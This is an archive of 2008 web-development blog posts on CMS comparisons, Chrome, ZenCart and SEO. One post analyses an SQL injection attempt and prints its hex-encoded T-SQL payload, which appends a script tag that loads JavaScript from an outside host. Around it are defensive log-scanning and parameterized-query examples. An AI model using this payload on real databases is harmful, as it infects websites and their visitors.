Sep 05 2008

Joomla vs Ektron

We have been receiving a lot of comparison inquiries lately and I wanted to put this simple Joomla vs Ektron content management systems comparison table out there. Keep in mind that much of the decision about which CMS to choose for your company or organization is usually made well before this comparison, since the two systems differ at such a fundamental level. However, this is a comparison of those fundamentals plus some of the ‘interesting’ features.


| Feature/Item | Joomla | Ektron |
| --- | --- | --- |
| License Model | Open Source | Closed Source, Compiled |
| Price | Free | Starts at $15,000 |
| Web Platform | PHP | ASP.NET 2.0 |
| Database | MySQL | MS SQL (Express version OK) |
| Extendability Options | Plugins, Components, Mambots. Joomla 1.5 went through significant development that now offers many hook-ups for plugins without hacking any core files. | Plugins (Observer Method), Ektron API (via ASP.NET code behind), Extensive Web Services API |
| SEO Options | Search Engine Friendly URLs (Joomla 1.5); Meta tags controls; Full template overrides, clean HTML | Search Engine Friendly URLs (CMS400 7.6); Meta tags controls and consolidation; Content Tagging; Full template overrides, HTML is often not so clean (part issue with .NET as well) |
| Social Networking | None, unless using a third party component or a plugin. | Many features built in: Personal profile, personal area, connections between profiles, forums, blogging. |

Thoughts?


Sep 03 2008

First Google Chrome Screenshots

Google Chrome is new (still in beta) and I went ahead and installed it on one of our VMs. It seems like a lot of the functionality from the popular Firefox extension ‘FireBug’ is built in. Here are the screenshots:

  • Google Chrome Screenshot 1: Main Page
  • Google Chrome Screenshot 2: Search right from the address bar
  • Google Chrome Screenshot 3: Browsing History
  • Google Chrome Screenshot 4: Incognito Browsing
  • Google Chrome Screenshot 5: Right Clicking a Link Uses Google Gears
  • Google Chrome Screenshot 6: Inspecting Page Elements a-la Firebug
  • Google Chrome Screenshot 7: View Source


Sep 02 2008

New Web Browser by Google: Chrome

Published by Ron Peled under Web Development

Google is now officially in the browser business. I guess that the Google bars weren’t enough of a penetration into the browser market and Google wanted/needed additional features (and feedback?) from users. Anyway, Google now offers a new web browser: Chrome. Google also explained briefly why they have decided to launch a new browser. So, what does it mean for us, web developers?

  1. An additional browser to pay attention to and run tests for. When Google launches a new browser, it is not another niche browser that we can skip in our testing. It is probably going to have a sizeable market share.
  2. Visit the ‘For Web Developers‘ page posted by Chrome. You will find useful information for what we do. One piece of advice is that if we tested our sites on Safari 3.1, then the page will work fine on Google Chrome. However, they still post some tips and testing tools.
  3. Explore and learn V8 - the underlying engine that powers Google Chrome. According to Google, V8 is a platform that will help power the next generation of web applications. As mentioned on their ‘Why’ page: “We also built V8, a more powerful JavaScript engine, to power the next generation of web applications that aren’t even possible in today’s browsers.”

It is never boring in the world of web development, is it?


Aug 27 2008

Inspiring Commentary Article on Web Design Practices

Written by Kimberly Elam, Web Design by Design made me think twice before running to draft the next website design with our designer. This minimalistic approach of almost too little, but just enough to make a clear point, is great because it begs for more. As Kimberly puts it, the user remains hungry for more information. And guess what they will probably do? Call or email for more information!

This article highlights a similar line of thought for successful web firms: they target what their clients need, not what they can do with technology or design. This reminds us that websites, in any aspect, design or web development, are here to serve the business. A website is just a tool, not the goal.

This matches our line of thought at Activo: each one of our proposals begins with the goals of the project. In other words, what will we achieve with the following web development project?


Aug 25 2008

Looking Ahead: ZenCart ver 1.4

The ZenCart developer team seems to be hard at work and preparing to deliver a new version of ZenCart: ver 1.4. The core developers posted a roadmap brief for version 1.4 back in September of 2007. Recently, additional entries have been posted in the forums describing in more detail the upcoming changes and signaling a new release is to be expected soon.

The currently described updates to ZenCart are done all around the DB, its architecture, and improving its performance. To summarise from the ZenCart forums:

New Database Driver Layer
  • Extremely light/flexible drivers make it easier to support other Database Types
  • Preliminary support for InnoDB and MySQL transactions

SQL Caching system rewritten
  • Much easier to add new caching types
  • Preliminary Support for Memcache

Use of MPTT for category structure
  • Reduces number of queries needed to ‘describe’ the category structure
  • Improves user experience thru reduced page load times

Supporting Classes to reduce query load
  • Hugely reduces queries needed
  • Reuses queries using Cache to further improve performance

The roadmap for ZenCart ver 1.4 promises the following updates to the code (summarized):

  • Better usage of PHP 5.2 features. This also means 5.2 will be the new minimum requirement.
  • More Object Oriented code, less of the old osCommerce code.
  • Lots of DB improvements (some is described above, seems more is yet to come).
  • Category structure converted to MPTT format. MPTT stands for Modified Preorder Tree Traversal (explanation of MPTT).
  • Performance improvements for sites with lots of product attributes.
  • More function libraries converted to classes.
  • Duplicate components shared between admin and catalog.
  • Template system enhancements: less tables and more admin control.
  • Additional notifiers for the observer system.
  • Transaction support with InnoDB. Also mentioned as initial stage according to the recent posts of the updates that were done so far.
  • SwiftMailer instead of phpMailer.
  • Stock and SKU per product attribute.
  • Security enhancements.

Keep up the good work!


Aug 21 2008

Authorize.net changes Transaction ID field - ZenCart passes tests

Just a quick note that Authorize.net will be upping the limit on the transaction ID field. Apparently, they are close to reaching the limit of the field type, so they are adding digits to the field - we are talking about some really big numbers! ZenCart seems to have acknowledged the news and tested their latest stable release. On ZenCart’s end, all seems to be OK except a small DB change that will only affect shops that choose to store the transactions over time. Hence a quick fix is posted on ZenCart’s forum.

This also means that all plugins, modules, or any Authorize.net integration scripts need to be tested. This change will probably not be a make or break for any code that integrates with Authorize.net APIs, but it is worth verifying your code and your shopping cart just in case.

Originally Posted by Authorize.net:

What is going on with the Transaction ID field?
The Transaction ID field was originally developed with a maximum numeric value of 2,147,483,647. As the number of merchants using the Authorize.Net Payment Gateway has grown, we have identified a time in the near future in which the Transaction ID count will surpass 2,147,483,647. For this reason, we are in the process of expanding the range of Transaction IDs that the payment gateway can issue. Accordingly, we are communicating to all Authorize.Net merchants to verify that your systems can accommodate a 10-digit Transaction ID greater than 2,147,483,647.

Aug 19 2008

Hack attempt: SQL Injection Targeting MS SQL Servers

I noticed one of our client’s IIS web servers was getting a lot of SQL Injection attempts this past week. These attacks pass T-SQL code into querystring parameters in hopes that the application is not checking inputs.

Here’s the code: (I removed the SQL exec() statement and replaced it with print so you can see the unencoded SQL.)

DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C4152452040542
05641524348415228323535292C4043205641524348415228323535292
04445434C415245205461626C655F437572736F7220435552534F52204
64F522053454C45435420612E6E616D652C622E6E616D652046524F4D2
07379736F626A6563747320612C737973636F6C756D6E7320622057484
5524520612E69643D622E696420414E4420612E78747970653D2775272
0414E442028622E78747970653D3939204F5220622E78747970653D333
5204F5220622E78747970653D323331204F5220622E78747970653D313
63729204F50454E205461626C655F437572736F72204645544348204E4
558542046524F4D205461626C655F437572736F7220494E544F2040542
C4043205748494C4528404046455443485F5354415455533D302920424
547494E20455845432827555044415445205B272B40542B275D2053455
4205B272B40432B275D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E393868732E72752F6A732E6A73
3E3C2F7363726970743E27272729204645544348204E4558542046524F4
D205461626C655F437572736F7220494E544F2040542C404320454E4420
434C4F5345205461626C655F437572736F72204445414C4C4F434154452
05461626C655F437572736F7220 AS VARCHAR(4000));

print @S;

This particular attack is well known and has been sighted in several variants:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
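
A log triage helper for the pattern shown above, added here as an example (not code from the original post): it finds CAST(0x… AS VARCHAR/NVARCHAR) wrappers in IIS query strings and decodes the hex to text for review without executing it. The W3C log lines, field layout, addresses and the harmless hex payloads are constructed for illustration; the NVARCHAR (UTF-16LE) branch goes beyond the VARCHAR case shown on this page.

```python
import re
from urllib.parse import unquote_plus

# CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR(n): the wrapper used by the payload above.
HEX_CAST = re.compile(
    r"CAST\s*\(\s*0x((?:[0-9A-F]{2})+)\s+AS\s+(N?VARCHAR)\s*\(", re.IGNORECASE
)


def decode_hex_casts(query_string):
    """Return the text hidden in each hex CAST found in a raw query string.

    The hex is only decoded for a human to read; nothing is sent to a database.
    """
    found = []
    for match in HEX_CAST.finditer(unquote_plus(query_string)):
        raw = bytes.fromhex(match.group(1))
        # SQL Server stores NVARCHAR as UTF-16LE; VARCHAR is one byte per character.
        wide = match.group(2).upper() == "NVARCHAR"
        found.append(raw.decode("utf-16-le" if wide else "latin-1", errors="replace"))
    return found


def scan_iis_log(lines):
    """Return (client_ip, uri_stem, decoded_sql) for each hit in W3C-format log lines."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names announced by IIS
        elif line.strip() and not line.startswith("#"):
            entry = dict(zip(fields, line.split()))
            for sql in decode_hex_casts(entry.get("cs-uri-query", "")):
                hits.append((entry.get("c-ip"), entry.get("cs-uri-stem"), sql))
    return hits


# Constructed sample log (documentation IP ranges, harmless "SELECT 1" payloads).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-08-12 03:14:07 GET /products.asp id=12 192.0.2.10 200
2008-08-12 03:14:09 GET /products.asp id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20VARCHAR(4000));EXEC(@S); 203.0.113.7 500
2008-08-12 03:15:30 GET /news.asp cat=3;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(0x530045004C0045004300540020003100+AS+NVARCHAR(4000));EXEC(@S); 203.0.113.9 500
"""

if __name__ == "__main__":
    for ip, stem, sql in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {stem} -> {sql!r}")
```

Requests flagged this way are worth correlating with the response status and with any unexpected changes to text columns in the database.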

Using the following web application best practices, we avoid getting hacked:

  • Application level:
    • Never trust user input (e.g. querystring or form posts). Always consider that user input may contain exploit code and check it appropriately.
    • Always use Stored Procedures and/or Parameterized database queries. Don’t build SQL queries using string concatenation.
    • Use typed variables when possible. Converting a querystring parameter to an integer before passing it to a SQL query can inhibit some attacks.
  • Database level:
    • Use limited database permissions. For example, for SQL Server, don’t let your application run under the “sa” user. The database user should only have permission in the particular database used by the application.
    • If possible, disable extended stored procedures such as xp_cmdshell.
    • Don’t use dynamic SQL. Dynamic SQL can be just as bad as building queries using string concatenation.
      Some DBAs have server-wide policies of no Dynamic SQL.
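
The application-level items from the list above in one place, as an added example rather than code from the original post: the concatenated query next to a typed, parameterized lookup. SQLite stands in for SQL Server so the block runs offline; the products table, the function names and the harmless sample input are assumptions made for illustration.

```python
import sqlite3

# Constructed input shaped like the attack above, with a harmless "SELECT 1" payload.
INJECTED_ID = (
    "1;DECLARE @S VARCHAR(4000);"
    "SET @S=CAST(0x53454C4543542031 AS VARCHAR(4000));EXEC(@S);"
)


def make_db():
    """In-memory SQLite database standing in for the application's SQL Server."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    return db


def build_query_unsafe(raw_id):
    """Anti-pattern: the querystring value is concatenated into the SQL text."""
    return "SELECT name FROM products WHERE id = " + raw_id


def parse_id(raw_id):
    """Typed variable: accept only ASCII digits, then convert to int."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)


def lookup_bound(db, value):
    """Parameterized query: the driver binds the value, it never becomes SQL text."""
    row = db.execute("SELECT name FROM products WHERE id = ?", (value,)).fetchone()
    return row[0] if row else None


def get_product_name(db, raw_id):
    """Both defenses together: validate the type first, then bind the parameter."""
    return lookup_bound(db, parse_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    # With concatenation, the extra statements become part of the SQL batch.
    print(build_query_unsafe(INJECTED_ID))
    # With binding alone, the same input is just a value that matches no row.
    print(lookup_bound(db, INJECTED_ID))
    # With type checking, the request is rejected before any query runs.
    try:
        get_product_name(db, INJECTED_ID)
    except ValueError as err:
        print("rejected:", err)
```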

The application level is crucial. Since a web application may someday be moved to a new server, we can’t assume that the web server and database have been configured using best practices.

All layers of security are important, though: If you’re using a third-party or closed-source web application, you may not have access to application code. In that case, the Database and Web Server layers are your last defense against exploits in improperly written code.


Aug 19 2008

5 Missing Features Preventing Joomla! CMS from Entering the Enterprise CMS Market

You’ll love Joomla! CMS because it is a great open source and free CMS with lots of features, stable releases, and it comes with a huge supporting community. Don’t get us wrong, we love Joomla CMS too and truly believe that this open source application is a big head start for any content based website. But since we used Joomla on many advanced Web 2.0 websites, we have found its limits, and sometimes struggled with those limits to a point of considering other systems or even using a framework instead. Let’s look closer at the missing features:

Looking closer at what features Joomla is missing

1. Directory or node-based category structure

This is one of the biggest pain points with using Joomla or trying to explain how to use Joomla to new users. Joomla places all content items within sections and categories. Before Joomla 1.5, all content items were required to be in one of these sections and categories. In other words, the system was limited to a two level categorization and the categorization was enforced. In Joomla 1.5, it is not a requirement, however, if you wish to categorize the content items you must use this archaic system.

So, what’s missing? It needs a node based categorization. Similar to any folder structure out there in any operating system. You can create folders with content items in them and you have a nice flexible and fully comprehensible system. No more workarounds. This will then boost the use of any dynamic plugins that can rely on the folder structure for certain features. A great example is a News & Events section that is needed for almost every serious website: with flexible node system you can create a news folder and an events folder and place your articles there. If in the future you wish to add sub categories to your news - no problem! (with the current and the old system - you’ll have to rethink once you get to a certain depth level).

2. A Real Authorship Path and Publication Mechanism

Yes, it is true that users have multiple levels right out of the box in Joomla. But it lacks any sort of a mechanism that controls the workflow of the content item. Ideally, you will have one user that will add new content items and another that will have to approve before it goes live in a specific section. The publisher user will have the rights to publish only in his/her sections, etc. This is a basic feature in many enterprise content management systems.

3. Content Articles Versioning

In Joomla, once you made the change and hit that save button - there is no way to go back in time and undo your changes. Ideally, Joomla will save every instance of the content item and keep track of its versions. How it does it is not important, whether it uses SVN like versioning which efficiently saves only the diff values, or if it actually saves the entire content item every time a revision is made does not matter. The feature that is missing is the versioning itself.

4. Built In Separation Between ‘Live’ and ‘Staging’ Environments

For businesses that value their websites and understand the sensitivity of them, we always recommend setting up a staging environment. This is where all users, developers, and designers can see the latest revisions before they go live. It provides another stage of error handling instead of working a fire drill on a regular basis. Many enterprise content management systems have this option as a built-in mechanism. From the same admin panel or work area, the admin presses a button and the latest version of the site is then ‘pushed’ live. We currently have Linux scripts that do the job but there is no way for a non-developer to handle this case. Ideally, this needs to be from the admin panel of Joomla.

5. Document Management System (File Manager)

So, we all know that Joomla’s File Manager or ‘Media’ manager is a bit lacking. It has the basic functionality that assists with uploading files, moving, deleting them - but that’s it. A DMS (Document Management System) allows each user to manage their own document area, which in turn allows better handling of uploading and using files with drag and drop controls, and an improved management interface for admins that can more easily handle large numbers of folders and files.

Conclusion

Joomla CMS is a great open source CMS, no doubt. However, if the above five missing features are added, it will make it easier for us to be able to offer this CMS to the enterprise. For now, the commercial CMS spectrum is what we have to work with for enterprise level content management systems.


Jul 30 2008

Ektron: Clarification on User Controls vs API

We recently spotted an article from Bill Rogers’ blog (Ektron’s CEO) which discusses usage of the Ektron Server Controls vs. Ektron’s API. At Activo, we are constantly using both approaches and indeed each approach is a bit different and is used in different situations. The article makes it much clearer that Ektron actually put more effort than we thought before into the Server Controls. Understanding that the Server Controls were made for this sort of usage makes us now feel more secure using this method. Previously, I always thought of this method as a hack and preferred the API.

Frank heads our .NET development team and added the following:

I’ve found it easier to start off with a foundation of one of the server controls and build off of that, rather than using only API calls. The server control acts as a “datareader” which can be used to access the data initially. Many of the custom controls we built to replace XSLT use this model:

  • Add a ListSummary inside the user control/page and set its properties.
  • Access the ListSummary’s EkItems property.
  • Manipulate the data from EkItems, transform it, and output it into a repeater.

This tends to work more reliably than using the API calls. However, if the code needs to bypass the permissions model, the only option is to go direct using the API.


Jul 05 2008

Flash and Search Engine Optimization (SEO)

Those of you who worked with Activo on SEO projects know that we have always opposed Flash. At Activo we always valued traffic over look & feel, which translated into avoiding Flash technology altogether. Well, no more! If it is true that Flash sites can now receive ‘equal’ treatment, then we will give Flash its place in our Web Development practices.

In recent days, both Adobe and Google issued press releases and blog articles on how Google’s crawler will be able to read into Shockwave (.swf) files. This means that all text, menus, and content that is embedded in a Flash object file will now be readable by search engines. Adobe published the Shockwave standards so search engines will be able to read it and Google was one of the first to respond and announce that it knows how to read Shockwave contents. What a welcome change!

What this means is that we will now have additional parameters to take into account, especially in websites that have decided not to work with Flash as their main platform but instead offer a small portion of their home page in Flash (such as a banner or a rotating main message). Additionally, if this holds true and Google will be able to read into Shockwave (Flash) files, then we will start seeing more Flash-based sites coming up in the organic search results from Google and other search engines.

Sources: